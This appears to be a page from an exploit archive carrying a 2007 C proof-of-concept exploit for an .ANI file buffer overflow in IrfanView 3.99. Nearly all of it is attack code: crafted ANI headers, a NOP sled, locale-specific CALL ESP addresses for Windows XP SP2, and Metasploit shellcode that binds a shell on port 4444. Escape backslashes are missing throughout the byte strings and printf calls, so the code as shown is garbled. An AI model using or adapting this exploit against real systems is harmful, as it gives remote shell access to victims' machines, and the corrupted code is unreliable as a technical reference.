[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)
# Published : 2007-04-09
# Author : Breno Silva Pinto
# Previous Title : ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
# Next Title : VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit 


/*
                IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)                 
                
                Old Target:
                     Windows XP Sp2 FR   
                
                New targets:
                     Windows XP SP2 Portuguese Call ESP Addr 
                     Windows XP SP2 English    Call ESP Addr 
          
      Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
                
                     
*/

#include <stdio.h>
#include <stdlib.h>

/* win32_exec -  EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
char BindShellcode[]=
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c" 
"x24x24x8bx45x3cx8bx7cx05x78x01xefx8b" 
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01" 
"xeex31xc0x99xacx84xc0x74x07xc1xcax0d" 
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" 
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb" 
"x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" 
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" 
"x08x5ex68x8ex4ex0execx50xffxd6x66x53" 
"x66x68x33x32x68x77x73x32x5fx54xffxd0" 
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66" 
"x81xedx08x02x55x6ax02xffxd0x68xd9x09" 
"xf5xadx57xffxd6x53x53x53x53x53x43x53" 
"x43x53xffxd0x66x68x11x5cx66x53x89xe1" 
"x95x68xa4x1ax70xc7x57xffxd6x6ax10x51" 
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53" 
"x55xffxd0x68xe5x49x86x49x57xffxd6x50" 
"x54x54x55xffxd0x93x68xe7x79xc6x79x57"
"xffxd6x55xffxd0x66x6ax64x66x68x63x6d" 
"x89xe5x6ax50x59x29xccx89xe7x6ax44x89" 
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93" 
"x8dx7ax38xabxabxabx68x72xfexb3x16xff" 
"x75x44xffxd6x5bx57x52x51x51x51x6ax01"
"x51x51x55x51xffxd0x68xadxd9x05xcex53" 
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83" 
"xc4x64xffxd6x52xffxd0x68x7exd8xe2x73" 
"x53xffxd6xffxd0";

unsigned char Ani_headers[] = 
"x52x49x46x46x2ax16x00x00x41x43x4fx4ex4cx49x53x54"
"x44x00x00x00x49x4ex46x4fx49x4ex41x4dx0ax00x00x00"
"x4dx65x74x72x6fx6ex6fx6dx65x00x49x41x52x54x26x00"
"x00x00x4dx61x72x73x75x70x69x6cx61x6dx69x50x6fx77"
"x61x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx20x4dx61"
"x72x63x68x20x20x30x37x00x61x6ex69x68x24x10x00x00"
"x24";


int main(int argc, char* argv[])
{
	FILE* anifile;
	char evilbuff[1500];
	int ani_size;
	
	printf("[+] IrfanView 3.99 .ANI File Buffer Overflow (Multiple targets / Port bind shellcode )n");
	printf("[+] Breno Silva Pinto - bsilva[at]sekure.orgn");
	if (argc!=3) {
		printf("[+] Usage: %s <file.ani> <target>n",argv[0]);
		printf("[+] Targets:n");
        printf("[+] 1 - Windows Xp Sp2 Portuguesen");
        printf("[+] 2 - Windows Xp SP2 Francen");
        printf("[+] 3 - Windows Xp SP2 Englishn");
        return 0;
	}
	
	ani_size=sizeof(Ani_headers)-1;
	memset(evilbuff,0x90,1500);
	memcpy(evilbuff,Ani_headers,ani_size);
	
	switch (atoi(argv[2])) {
        case 1: /* PORTUGUESE - BR */
             memcpy(evilbuff+ani_size+459,"x5dx38x82x7c",4); 				/* CALL ESP in Kernel32.dll */
         break;
    	case 2: /* FRA?AIS */
             memcpy(evilbuff+ani_size+459,"x8bx51x81x7c",4); 				/* CALL ESP in Kernel32.dll */
    	 break;
        case 3: /* ENGLISH */
             memcpy(evilbuff+ani_size+459,"xd8x69x83x7c",4); 				/* CALL ESP in Kernel32.dll */
         break;
    }
    
	memcpy(evilbuff+ani_size+466,BindShellcode,strlen(BindShellcode));
	memset(evilbuff+ani_size+strlen(BindShellcode)+10,0,1);
	
	anifile=fopen(argv[1],"wb");
	fwrite( evilbuff, 1, sizeof(evilbuff), anifile );
	fclose(anifile);
	printf(".ANI file createdn");
	return 0;
	
}

// www.Syue.com [2007-04-09]